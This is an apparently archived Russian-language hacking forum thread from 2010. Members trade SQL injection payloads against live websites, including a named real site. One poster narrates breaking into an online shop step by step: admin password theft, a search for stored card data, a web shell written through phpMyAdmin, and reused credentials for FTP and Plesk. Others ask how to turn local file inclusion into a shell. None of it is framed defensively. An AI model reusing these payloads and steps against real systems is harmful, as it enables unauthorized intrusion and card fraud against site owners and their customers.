ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.08.2010, 15:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
2381
Репутация:
0
|
|
Почему в Blind SQL Injection, когда ввожу запрос: xxxx.com/shooping_cart.php?prod_id=(1)and(select+1+from(sel ect+count(*),concat((select+table_name+from+inform ation_schema.tables+limit+0,1),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)--
выводится ошибка:Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
И еще вопрос почему запрос shoping_cart.php?prod_id=22+and+length(@@version)> 1 проходит нормально,
а prod_id=22+and+substring(@@version,1,1)=5 выдает ошибку Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
UPDATE: Разобрался. Надо было использовать конструкцию SUBSTRING(@@version FROM 1 FOR 1)
UPDATE2: Ура! Есть пароль к админке!!! только вот картона в админке нет, хотя есть все продажи. На сайте есть форма вбива картона. Может ли быть что он не сохраняется?
UPDATE3: Ура! В админке есть полноценная SQL инъекция (не блайнд)=))
UPDATE4: Есть доступ к файлам из MySQL (file_priv=Y) как отредактировать php файлы на сервере?
UPDATE5: Откопал доступ к phpmyadmin. Осталось залить шелл. Как залить шелл через PHPmyAdmin?
|
|
|
|
25.08.2010, 20:21
|
|
Moderator - Level 7
Регистрация: 10.03.2009
Сообщений: 1,013
Провел на форуме:
6183433
Репутация:
1521
|
|
http://as-roma.ru/team.php?id=61+order+by+15--
алерты как раскрутитЬ?
|
|
|
25.08.2010, 20:23
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от DavletAG
DavletAG said:
Почему в Blind SQL Injection, когда ввожу запрос: xxxx.com/shooping_cart.php?prod_id=(1)and(select+1+from(sel ect+count(*),concat((select+table_name+from+inform ation_schema.tables+limit+0,1),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)--
выводится ошибка:Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
И еще вопрос почему запрос shoping_cart.php?prod_id=22+and+length(@@version)> 1 проходит нормально,
а prod_id=22+and+substring(@@version,1,1)=5 выдает ошибку Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
UPDATE: Разобрался. Надо было использовать конструкцию SUBSTRING(@@version FROM 1 FOR 1)
UPDATE2: Ура! Есть пароль к админке!!! только вот картона в админке нет, хотя есть все продажи. На сайте есть форма вбива картона. Может ли быть что он не сохраняется?
UPDATE3: Ура! В админке есть полноценная SQL инъекция (не блайнд)=))
UPDATE4: Есть доступ к файлам из MySQL (file_priv=Y) как отредактировать php файлы на сервере?
UPDATE5: Откопал доступ к phpmyadmin. Осталось залить шелл. Как залить шелл через PHPmyAdmin?
Попробуй здесь посмотреть
|
|
|
|
25.08.2010, 20:26
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709
Репутация:
1
|
|
Подскажите пожалуйста, как раскрутить LFI на сервере с FreeBSD? Цель - залить шелл. На никсах знаю, через environ, но на фрях это не катит (или я не там смотрел?)...есть ли какой-нибудь хороший и главное понятный ман по раскрутке LFI на различных ОСях?
Заранее спасибо...
|
|
|
|
25.08.2010, 20:40
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917
Репутация:
17
|
|
Сообщение от Lilo
Lilo said:
http://as-roma.ru/team.php?id=61+order+by+15--
алерты как раскрутитЬ?
http://as-roma.ru/team.php?id=61+union+select+1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1--
Вот поля. Видимо слепая она.
|
|
|
|
25.08.2010, 20:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
2381
Репутация:
0
|
|
Нашел инструкцию залива шелла через phpmyadmin. Все сделал как надо. Все прошло без ошибок. Файл создался (т.к. при повторном запросе пишет что данный файл уже существует) но когда я ввожу в адресной строке site.com/shell.php то у меня открывается SiteMap. Причем этот же сайт мап открывается если ввести не существующий файл например site.com/dasdasd.php
В чем проблема?
UPDATE: ОХРЕНЕТЬ!!! Пароль от SQL подошел к FTP!!! Ща наведу там порядок
|
|
|
|
25.08.2010, 21:04
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
|
|
|
|
25.08.2010, 22:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
2381
Репутация:
0
|
|
Сообщение от DavletAG
DavletAG said:
Нашел инструкцию залива шелла через phpmyadmin. Все сделал как надо. Все прошло без ошибок. Файл создался (т.к. при повторном запросе пишет что данный файл уже существует) но когда я ввожу в адресной строке site.com/shell.php то у меня открывается SiteMap. Причем этот же сайт мап открывается если ввести не существующий файл например site.com/dasdasd.php
В чем проблема?
UPDATE: ОХРЕНЕТЬ!!! Пароль от SQL подошел к FTP!!! Ща наведу там порядок
UPDATE2: FTP шняга. Получил доступ к Parallels (PLESK) по порту 8443 вот это п****ц
|
|
|
|
26.08.2010, 11:19
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
Сообщение от Charle
Charle said:
Вывод имён колонок (MySQL >= 4.1 колонки NOT NULL)
Jokester как-то писал на одном форуме:
а можно ссылку на статью, гугл не находит
|
|
|
|
26.08.2010, 15:16
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от durito
durito said:
а можно ссылку на статью, гугл не находит
Можно: https://rdot.org/forum/showthread.php?t=60
Только метод этот не мой, попрошу мне чужие заслуги не приписывать
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
